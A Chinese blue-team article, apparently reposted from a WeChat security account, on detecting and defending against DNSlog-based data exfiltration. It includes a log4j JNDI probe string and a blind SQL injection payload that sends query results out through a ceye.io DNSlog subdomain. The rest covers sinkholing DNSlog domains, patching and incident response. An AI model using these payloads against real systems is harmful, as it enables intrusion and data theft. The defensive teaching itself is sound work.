前言
DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到自己这里,然后通过读日志获取信息。
所以这里跟最初的猜想基本一致,原理也就是通过DNS请求后,通过读取日志来获取我们的请求信息。
本技战法以攻击视角为切入点,构建适用于任意行业网络安全的“DNSlog安全防御体系”。
以攻击者视角看DNSlog
(一)DNSlog用途
根据近年来攻防演练的经验,DNSlog经常被用于:数据无回显,命令执行,log4j漏洞检测,CSRF漏洞检测等所有涉及无回显,高隐蔽的攻击。
(二)使用DNSlog常用手段
DNSlog的使用,通常要和其他漏洞结合使用,有以下三种常见的方式:
-
命令执行无回显通过DNSlog执行命令,将数据带出网络,回显到DNSlog平台
2.近年的log4j漏洞的检测POC为:${jndi:ldap://ip:port/exp}以及一些变种、编码绕过等
3.SQL注入无回显利用
这是一条利用dnslog进行无回显注入
1. ?id=1' and if((select load_file(concat('\\',(攻击代码),'.xxxxxx.ceye.io\abc'))),1,0)--+DNSlog攻击预防
(一)事前排查
-
如果是Java业务,并且使用了log4j,一是排查是否安装了最新补丁,自查资产。
-
将业务系统更新到最新系统,并且时刻检测是否有更新包
(二)提前预判,提前阻拦
通过FOFA、鹰图、钟馗之眼、360资产测绘、Shodan等资产测绘平台,以DNSlog平台为指纹,提前收集DNSlog地址,并且在域控DNS服务器添加正向解析,防止数据被外带。
配置如下
*.dnslog.cnA127.0.0.1
这样所有DNS数据将被发送到本地,不被外带,留给充足的时间应急响应。
(三) 事中排查与分析
当发现服务器出现DNSlog数据外带的告警,通过以下方式开展排查与分析工作:
Wireshark抓包工具
事后溯源与处置
当发现服务器被植入了DNSlog流量,处置思路如下所示:
一是快速处置:首先隔离受影响的服务器。
二是分析目的地址:通过抓包,过滤出DNSlog的地址,确定为真实流量。
三是溯源分析:根据威胁分析平台中的威胁告警、Web访问流量等,综合判断攻击者通过什么漏洞进行的攻击,还原完整攻击链;
四是应急处置:先通过DNS服务器,重定向DNSlog地址到127.0.0.1,然后进行排查服务器的网络状态、异常文件、异常进程、异常用户、异常启动项、异常计划任务等,清除攻击者留下的后门。
五是修复漏洞:根据溯源分析还原的完整攻击链,制定相关漏洞修复方案,并进行修复。
六是缓解措施:若暂时无法修复漏洞,使用WAF封禁漏洞利用的接口,或通过代理服务器的访问规则屏蔽漏洞利用的接口。
七是业务恢复:处置完毕,业务重新上线。
原文始发于微信公众号(知攻善防实验室):创新蓝队-针对DNSlog数据外带攻击的应急与预防
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论